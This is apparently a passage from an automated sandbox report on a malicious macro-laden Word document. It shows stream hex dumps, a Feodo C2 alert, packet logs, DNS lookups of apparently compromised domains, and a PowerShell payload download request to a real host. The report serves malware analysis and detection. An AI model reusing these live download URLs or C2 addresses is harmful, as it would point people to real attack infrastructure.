                                                                          File Type:data
                                                                          Stream Size:146
                                                                          Entropy:4.00187355764
                                                                          Base64 Encoded:False
                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
                                                                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00
                                                                          Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 316
                                                                          General
                                                                          Stream Path:\x5DocumentSummaryInformation
                                                                          File Type:data
                                                                          Stream Size:316
                                                                          Entropy:3.13931601016
                                                                          Base64 Encoded:False
                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . . . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . K . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 0c 01 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 ec 00 00 00 05 00 00 00 70 00 00 00 06 00 00 00 78 00 00 00 11 00 00 00 80 00 00 00 17 00 00 00 88 00 00 00 0b 00 00 00 90 00 00 00 10 00 00 00 98 00 00 00 13 00 00 00 a0 00 00 00
                                                                          Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 520
                                                                          General
                                                                          Stream Path:\x5SummaryInformation
                                                                          File Type:data
                                                                          Stream Size:520
                                                                          Entropy:3.91439426516
                                                                          Base64 Encoded:False
                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 d8 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 60 01 00 00 03 00 00 00 98 00 00 00 04 00 00 00 44 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 c8 00 00 00 09 00 00 00 d4 00 00 00
                                                                          Stream Path: 1Table, File Type: data, Stream Size: 6885
                                                                          General
                                                                          Stream Path:1Table
                                                                          File Type:data
                                                                          Stream Size:6885
                                                                          Entropy:6.0189512257
                                                                          Base64 Encoded:True
                                                                          Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                                                          Data Raw:6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                                                          Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 527
                                                                          General
                                                                          Stream Path:Macros/PROJECT
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Stream Size:527
                                                                          Entropy:5.52643349927
                                                                          Base64 Encoded:True
                                                                          Data ASCII:I D = " { 3 4 8 2 5 3 8 1 - 3 9 1 5 - 4 2 D 7 - B C E B - D B 4 B F 3 B 3 B 9 D 0 } " . . D o c u m e n t = U 7 6 5 y 5 v g f _ a o 0 f a q / & H 0 0 0 0 0 0 0 0 . . M o d u l e = H t _ h _ p v 5 q q 7 t a e o e 3 a . . M o d u l e = G p 0 t 5 u c w n k n g 7 f i . . E x e N a m e 3 2 = " H n g q q _ v j w m d " . . N a m e = " $ $ " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 2 E 2 C C 8 F 6 4 8 3 E 2 8 4 2 2 8 4 2 2 8 4 2 2 8 4 2 "
                                                                          Data Raw:49 44 3d 22 7b 33 34 38 32 35 33 38 31 2d 33 39 31 35 2d 34 32 44 37 2d 42 43 45 42 2d 44 42 34 42 46 33 42 33 42 39 44 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 55 37 36 35 79 35 76 67 66 5f 61 6f 30 66 61 71 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 48 74 5f 68 5f 70 76 35 71 71 37 74 61 65 6f 65 33 61 0d 0a 4d 6f 64 75 6c 65 3d 47 70 30 74 35 75 63 77 6e 6b 6e
                                                                          Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 158
                                                                          General
                                                                          Stream Path:Macros/PROJECTwm
                                                                          File Type:data
                                                                          Stream Size:158
                                                                          Entropy:3.75971549021
                                                                          Base64 Encoded:False
                                                                          Data ASCII:U 7 6 5 y 5 v g f _ a o 0 f a q . U . 7 . 6 . 5 . y . 5 . v . g . f . _ . a . o . 0 . f . a . q . . . H t _ h _ p v 5 q q 7 t a e o e 3 a . H . t . _ . h . _ . p . v . 5 . q . q . 7 . t . a . e . o . e . 3 . a . . . G p 0 t 5 u c w n k n g 7 f i . G . p . 0 . t . 5 . u . c . w . n . k . n . g . 7 . f . i . . . . .
                                                                          Data Raw:55 37 36 35 79 35 76 67 66 5f 61 6f 30 66 61 71 00 55 00 37 00 36 00 35 00 79 00 35 00 76 00 67 00 66 00 5f 00 61 00 6f 00 30 00 66 00 61 00 71 00 00 00 48 74 5f 68 5f 70 76 35 71 71 37 74 61 65 6f 65 33 61 00 48 00 74 00 5f 00 68 00 5f 00 70 00 76 00 35 00 71 00 71 00 37 00 74 00 61 00 65 00 6f 00 65 00 33 00 61 00 00 00 47 70 30 74 35 75 63 77 6e 6b 6e 67 37 66 69 00 47 00 70 00
                                                                          Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4832
                                                                          General
                                                                          Stream Path:Macros/VBA/_VBA_PROJECT
                                                                          File Type:data
                                                                          Stream Size:4832
                                                                          Entropy:5.49501263006
                                                                          Base64 Encoded:True
                                                                          Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                                                                          Data Raw:cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                                                                          Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 643
                                                                          General
                                                                          Stream Path:Macros/VBA/dir
                                                                          File Type:data
                                                                          Stream Size:643
                                                                          Entropy:6.34732268372
                                                                          Base64 Encoded:True
                                                                          Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . D 2 . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . . c . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . O f f i c . . E O . f . . i . c 5 . E . . . . . . . E 2 D . F 8 D 0 4 C - 5 . B F A - 1 0 1 B -
                                                                          Data Raw:01 7f b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 44 32 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 be 63 fe 61 1a 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d
                                                                          Stream Path: WordDocument, File Type: data, Stream Size: 97248
                                                                          General
                                                                          Stream Path:WordDocument
                                                                          File Type:data
                                                                          Stream Size:97248
                                                                          Entropy:6.56028805033
                                                                          Base64 Encoded:True
                                                                          Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . { . . b . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                          Data Raw:ec a5 c1 00 5f c0 09 04 00 00 f1 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 f1 9a 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 e0 7b 01 00 62 7f 00 00 62 7f 00 00 f1 92 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00
                                                                          Stream Path: word, File Type: data, Stream Size: 435
                                                                          General
                                                                          Stream Path:word
                                                                          File Type:data
                                                                          Stream Size:435
                                                                          Entropy:7.51532274815
                                                                          Base64 Encoded:False
                                                                          Data ASCII:. . . . . . . . q . 8 N . . = . . . r . . 9 . n $ H . M . a . . . . v . / . . . . . . . z 3 . f . . . 5 . . } . Z + . J b . . . . { ` . . F . . . ] : 0 . . . . . H y . R . . . z . . . . . . . ; . . . . . . . . F ~ a . L . f 7 . . . 2 . . [ } . { . . . . . . " . . o . . . e . . . 0 . . - . 6 . # . . . V R ) . 2 V . . A s y . . V . . B . . . G 3 . * . . M . s . . . . > . . F s . X I . n . . . . . . @ . o . . . " . . . ] . r p I . [ . . . . . . . . l @ . . t . . v " 3 n @ Q 0 . | . H . . O . . % . Z A g . . .
                                                                          Data Raw:f2 dd 99 e7 92 11 fa 1f 71 ef 38 4e ee fa 3d f7 81 b1 72 fe 06 39 83 6e 24 48 ae 4d 84 61 e4 bc ee f8 76 f6 2f b8 fb 14 c3 d5 1f 8f 7a 33 c7 66 d4 ce 0e 35 be 2e 7d b9 5a 2b c3 4a 62 ac 9a 10 0a 7b 60 f5 83 46 c8 c8 b6 5d 3a 30 19 f4 f3 f0 80 48 79 b6 52 af fd bf 7a bd 9c 04 f5 b1 b2 17 3b 0f 84 ff d2 d1 e2 8e 05 46 7e 61 f3 4c 9f 66 37 d2 c9 1a 32 e4 bd 5b 7d a0 7b c6 a9 c4 d2 05

                                                                          Network Behavior

                                                                          Snort IDS Alerts

                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                          01/25/21-20:12:58.825219TCP2404322ET CNC Feodo Tracker Reported CnC Server TCP group 124917180192.168.2.22190.55.186.229

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Jan 25, 2021 20:10:44.496392965 CET4916580192.168.2.22172.217.6.174
                                                                          Jan 25, 2021 20:10:44.650060892 CET8049165172.217.6.174192.168.2.22
                                                                          Jan 25, 2021 20:10:44.650192022 CET4916580192.168.2.22172.217.6.174
                                                                          Jan 25, 2021 20:10:44.653403997 CET4916580192.168.2.22172.217.6.174
                                                                          Jan 25, 2021 20:10:44.807074070 CET8049165172.217.6.174192.168.2.22
                                                                          Jan 25, 2021 20:10:44.807477951 CET8049165172.217.6.174192.168.2.22
                                                                          Jan 25, 2021 20:10:44.807496071 CET8049165172.217.6.174192.168.2.22
                                                                          Jan 25, 2021 20:10:44.807576895 CET4916580192.168.2.22172.217.6.174
                                                                          Jan 25, 2021 20:10:44.878856897 CET49166443192.168.2.22104.21.88.166
                                                                          Jan 25, 2021 20:10:44.918772936 CET44349166104.21.88.166192.168.2.22
                                                                          Jan 25, 2021 20:10:44.918875933 CET49166443192.168.2.22104.21.88.166
                                                                          Jan 25, 2021 20:10:44.934160948 CET49166443192.168.2.22104.21.88.166
                                                                          Jan 25, 2021 20:10:44.974442959 CET44349166104.21.88.166192.168.2.22
                                                                          Jan 25, 2021 20:10:44.976679087 CET44349166104.21.88.166192.168.2.22
                                                                          Jan 25, 2021 20:10:44.976731062 CET44349166104.21.88.166192.168.2.22
                                                                          Jan 25, 2021 20:10:44.976869106 CET49166443192.168.2.22104.21.88.166
                                                                          Jan 25, 2021 20:10:44.990708113 CET49166443192.168.2.22104.21.88.166
                                                                          Jan 25, 2021 20:10:45.030774117 CET44349166104.21.88.166192.168.2.22
                                                                          Jan 25, 2021 20:10:45.031075954 CET44349166104.21.88.166192.168.2.22
                                                                          Jan 25, 2021 20:10:45.237993956 CET49166443192.168.2.22104.21.88.166
                                                                          Jan 25, 2021 20:10:45.277595043 CET44349166104.21.88.166192.168.2.22
                                                                          Jan 25, 2021 20:10:45.277751923 CET49166443192.168.2.22104.21.88.166
                                                                          Jan 25, 2021 20:10:45.315522909 CET49166443192.168.2.22104.21.88.166
                                                                          Jan 25, 2021 20:10:45.355663061 CET44349166104.21.88.166192.168.2.22
                                                                          Jan 25, 2021 20:12:24.791357994 CET4916580192.168.2.22172.217.6.174
                                                                          Jan 25, 2021 20:12:24.875777960 CET49166443192.168.2.22104.21.88.166
                                                                          Jan 25, 2021 20:12:24.916229963 CET44349166104.21.88.166192.168.2.22
                                                                          Jan 25, 2021 20:12:24.916246891 CET44349166104.21.88.166192.168.2.22
                                                                          Jan 25, 2021 20:12:24.916325092 CET49166443192.168.2.22104.21.88.166
                                                                          Jan 25, 2021 20:12:24.916347027 CET49166443192.168.2.22104.21.88.166
                                                                          Jan 25, 2021 20:12:24.945759058 CET8049165172.217.6.174192.168.2.22
                                                                          Jan 25, 2021 20:12:24.945846081 CET4916580192.168.2.22172.217.6.174
                                                                          Jan 25, 2021 20:12:27.330430031 CET4916780192.168.2.22212.227.200.73
                                                                          Jan 25, 2021 20:12:27.374927044 CET8049167212.227.200.73192.168.2.22
                                                                          Jan 25, 2021 20:12:27.375019073 CET4916780192.168.2.22212.227.200.73
                                                                          Jan 25, 2021 20:12:27.375190020 CET4916780192.168.2.22212.227.200.73
                                                                          Jan 25, 2021 20:12:27.419518948 CET8049167212.227.200.73192.168.2.22
                                                                          Jan 25, 2021 20:12:27.685669899 CET8049167212.227.200.73192.168.2.22
                                                                          Jan 25, 2021 20:12:27.750864983 CET49168443192.168.2.22212.227.200.73
                                                                          Jan 25, 2021 20:12:27.795397997 CET44349168212.227.200.73192.168.2.22
                                                                          Jan 25, 2021 20:12:27.795505047 CET49168443192.168.2.22212.227.200.73
                                                                          Jan 25, 2021 20:12:27.796173096 CET49168443192.168.2.22212.227.200.73
                                                                          Jan 25, 2021 20:12:27.840496063 CET44349168212.227.200.73192.168.2.22
                                                                          Jan 25, 2021 20:12:27.842187881 CET44349168212.227.200.73192.168.2.22
                                                                          Jan 25, 2021 20:12:27.842209101 CET44349168212.227.200.73192.168.2.22
                                                                          Jan 25, 2021 20:12:27.842226982 CET44349168212.227.200.73192.168.2.22
                                                                          Jan 25, 2021 20:12:27.842384100 CET49168443192.168.2.22212.227.200.73
                                                                          Jan 25, 2021 20:12:27.853910923 CET49168443192.168.2.22212.227.200.73
                                                                          Jan 25, 2021 20:12:27.895045996 CET4916780192.168.2.22212.227.200.73
                                                                          Jan 25, 2021 20:12:27.898761034 CET44349168212.227.200.73192.168.2.22
                                                                          Jan 25, 2021 20:12:27.923237085 CET49168443192.168.2.22212.227.200.73
                                                                          Jan 25, 2021 20:12:27.928705931 CET8049167212.227.200.73192.168.2.22
                                                                          Jan 25, 2021 20:12:27.928848028 CET4916780192.168.2.22212.227.200.73
                                                                          Jan 25, 2021 20:12:28.006716967 CET44349168212.227.200.73192.168.2.22
                                                                          Jan 25, 2021 20:12:28.277040005 CET44349168212.227.200.73192.168.2.22
                                                                          Jan 25, 2021 20:12:28.277066946 CET44349168212.227.200.73192.168.2.22
                                                                          Jan 25, 2021 20:12:28.277144909 CET49168443192.168.2.22212.227.200.73
                                                                          Jan 25, 2021 20:12:28.354706049 CET49169443192.168.2.22192.0.78.20
                                                                          Jan 25, 2021 20:12:28.394570112 CET44349169192.0.78.20192.168.2.22
                                                                          Jan 25, 2021 20:12:28.394645929 CET49169443192.168.2.22192.0.78.20
                                                                          Jan 25, 2021 20:12:28.395123005 CET49169443192.168.2.22192.0.78.20
                                                                          Jan 25, 2021 20:12:28.434878111 CET44349169192.0.78.20192.168.2.22
                                                                          Jan 25, 2021 20:12:28.434906006 CET44349169192.0.78.20192.168.2.22
                                                                          Jan 25, 2021 20:12:28.434926987 CET44349169192.0.78.20192.168.2.22
                                                                          Jan 25, 2021 20:12:28.434945107 CET44349169192.0.78.20192.168.2.22
                                                                          Jan 25, 2021 20:12:28.434956074 CET44349169192.0.78.20192.168.2.22
                                                                          Jan 25, 2021 20:12:28.434973955 CET49169443192.168.2.22192.0.78.20
                                                                          Jan 25, 2021 20:12:28.434999943 CET49169443192.168.2.22192.0.78.20
                                                                          Jan 25, 2021 20:12:28.435795069 CET44349169192.0.78.20192.168.2.22
                                                                          Jan 25, 2021 20:12:28.445310116 CET49169443192.168.2.22192.0.78.20
                                                                          Jan 25, 2021 20:12:28.485366106 CET44349169192.0.78.20192.168.2.22
                                                                          Jan 25, 2021 20:12:28.690653086 CET49169443192.168.2.22192.0.78.20
                                                                          Jan 25, 2021 20:12:28.729492903 CET44349169192.0.78.20192.168.2.22
                                                                          Jan 25, 2021 20:12:28.729617119 CET49169443192.168.2.22192.0.78.20
                                                                          Jan 25, 2021 20:12:29.266544104 CET49169443192.168.2.22192.0.78.20
                                                                          Jan 25, 2021 20:12:29.349483013 CET44349169192.0.78.20192.168.2.22
                                                                          Jan 25, 2021 20:12:29.912735939 CET44349169192.0.78.20192.168.2.22
                                                                          Jan 25, 2021 20:12:29.912786007 CET44349169192.0.78.20192.168.2.22
                                                                          Jan 25, 2021 20:12:29.912826061 CET44349169192.0.78.20192.168.2.22
                                                                          Jan 25, 2021 20:12:29.912843943 CET49169443192.168.2.22192.0.78.20
                                                                          Jan 25, 2021 20:12:29.912864923 CET44349169192.0.78.20192.168.2.22
                                                                          Jan 25, 2021 20:12:29.912903070 CET44349169192.0.78.20192.168.2.22
                                                                          Jan 25, 2021 20:12:29.912909031 CET49169443192.168.2.22192.0.78.20
                                                                          Jan 25, 2021 20:12:29.912942886 CET44349169192.0.78.20192.168.2.22
                                                                          Jan 25, 2021 20:12:29.912981033 CET44349169192.0.78.20192.168.2.22
                                                                          Jan 25, 2021 20:12:29.912992001 CET49169443192.168.2.22192.0.78.20
                                                                          Jan 25, 2021 20:12:29.913026094 CET44349169192.0.78.20192.168.2.22
                                                                          Jan 25, 2021 20:12:29.913068056 CET44349169192.0.78.20192.168.2.22
                                                                          Jan 25, 2021 20:12:29.913081884 CET49169443192.168.2.22192.0.78.20
                                                                          Jan 25, 2021 20:12:29.913106918 CET44349169192.0.78.20192.168.2.22
                                                                          Jan 25, 2021 20:12:29.913146019 CET44349169192.0.78.20192.168.2.22
                                                                          Jan 25, 2021 20:12:29.913163900 CET49169443192.168.2.22192.0.78.20
                                                                          Jan 25, 2021 20:12:29.913184881 CET44349169192.0.78.20192.168.2.22
                                                                          Jan 25, 2021 20:12:29.913230896 CET49169443192.168.2.22192.0.78.20
                                                                          Jan 25, 2021 20:12:29.915659904 CET44349169192.0.78.20192.168.2.22
                                                                          Jan 25, 2021 20:12:29.915704966 CET44349169192.0.78.20192.168.2.22
                                                                          Jan 25, 2021 20:12:29.915745974 CET44349169192.0.78.20192.168.2.22
                                                                          Jan 25, 2021 20:12:29.915755033 CET49169443192.168.2.22192.0.78.20
                                                                          Jan 25, 2021 20:12:29.918756008 CET44349169192.0.78.20192.168.2.22
                                                                          Jan 25, 2021 20:12:29.918853998 CET49169443192.168.2.22192.0.78.20

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Jan 25, 2021 20:10:44.417489052 CET5219753192.168.2.228.8.8.8
                                                                          Jan 25, 2021 20:10:44.478864908 CET53521978.8.8.8192.168.2.22
                                                                          Jan 25, 2021 20:10:44.830226898 CET5309953192.168.2.228.8.8.8
                                                                          Jan 25, 2021 20:10:44.878052950 CET53530998.8.8.8192.168.2.22
                                                                          Jan 25, 2021 20:12:24.897778988 CET5283853192.168.2.228.8.8.8
                                                                          Jan 25, 2021 20:12:24.964365005 CET53528388.8.8.8192.168.2.22
                                                                          Jan 25, 2021 20:12:27.269634962 CET6120053192.168.2.228.8.8.8
                                                                          Jan 25, 2021 20:12:27.329468966 CET53612008.8.8.8192.168.2.22
                                                                          Jan 25, 2021 20:12:27.690537930 CET4954853192.168.2.228.8.8.8
                                                                          Jan 25, 2021 20:12:27.749794960 CET53495488.8.8.8192.168.2.22
                                                                          Jan 25, 2021 20:12:28.290766954 CET5562753192.168.2.228.8.8.8
                                                                          Jan 25, 2021 20:12:28.354037046 CET53556278.8.8.8192.168.2.22
                                                                          Jan 25, 2021 20:12:28.644392967 CET5600953192.168.2.228.8.8.8
                                                                          Jan 25, 2021 20:12:28.692291975 CET53560098.8.8.8192.168.2.22
                                                                          Jan 25, 2021 20:12:28.695425034 CET6186553192.168.2.228.8.8.8
                                                                          Jan 25, 2021 20:12:28.751976967 CET53618658.8.8.8192.168.2.22

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                          Jan 25, 2021 20:10:44.417489052 CET192.168.2.228.8.8.80x1168Standard query (0)nightlifemumbai.clubA (IP address)IN (0x0001)
                                                                          Jan 25, 2021 20:10:44.830226898 CET192.168.2.228.8.8.80xc896Standard query (0)shop.nowfal.devA (IP address)IN (0x0001)
                                                                          Jan 25, 2021 20:12:24.897778988 CET192.168.2.228.8.8.80x2c09Standard query (0)e-wdesign.euA (IP address)IN (0x0001)
                                                                          Jan 25, 2021 20:12:27.269634962 CET192.168.2.228.8.8.80xd372Standard query (0)traumfrauen-ukraine.deA (IP address)IN (0x0001)
                                                                          Jan 25, 2021 20:12:27.690537930 CET192.168.2.228.8.8.80x26d4Standard query (0)traumfrauen-ukraine.deA (IP address)IN (0x0001)
                                                                          Jan 25, 2021 20:12:28.290766954 CET192.168.2.228.8.8.80xad13Standard query (0)jflmktg.wpcomstaging.comA (IP address)IN (0x0001)

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                          Jan 25, 2021 20:10:44.478864908 CET8.8.8.8192.168.2.220x1168No error (0)nightlifemumbai.club172.217.6.174A (IP address)IN (0x0001)
                                                                          Jan 25, 2021 20:10:44.878052950 CET8.8.8.8192.168.2.220xc896No error (0)shop.nowfal.dev104.21.88.166A (IP address)IN (0x0001)
                                                                          Jan 25, 2021 20:10:44.878052950 CET8.8.8.8192.168.2.220xc896No error (0)shop.nowfal.dev172.67.151.106A (IP address)IN (0x0001)
                                                                          Jan 25, 2021 20:12:24.964365005 CET8.8.8.8192.168.2.220x2c09Server failure (2)e-wdesign.eunonenoneA (IP address)IN (0x0001)
                                                                          Jan 25, 2021 20:12:27.329468966 CET8.8.8.8192.168.2.220xd372No error (0)traumfrauen-ukraine.de212.227.200.73A (IP address)IN (0x0001)
                                                                          Jan 25, 2021 20:12:27.749794960 CET8.8.8.8192.168.2.220x26d4No error (0)traumfrauen-ukraine.de212.227.200.73A (IP address)IN (0x0001)
                                                                          Jan 25, 2021 20:12:28.354037046 CET8.8.8.8192.168.2.220xad13No error (0)jflmktg.wpcomstaging.com192.0.78.20A (IP address)IN (0x0001)

                                                                          HTTP Request Dependency Graph

                                                                          • nightlifemumbai.club
                                                                          • traumfrauen-ukraine.de
                                                                          • 190.55.186.229

                                                                          HTTP Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          0192.168.2.2249165172.217.6.17480C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 25, 2021 20:10:44.653403997 CET0OUTGET /x/0wBD3/ HTTP/1.1
                                                                          Host: nightlifemumbai.club
                                                                          Connection: Keep-Alive
                                                                          Jan 25, 2021 20:10:44.807477951 CET1INHTTP/1.1 404 Not Found
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Referrer-Policy: no-referrer
                                                                          Content-Length: 1569
                                                                          Date: Mon, 25 Jan 2021 19:10:44 GMT
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 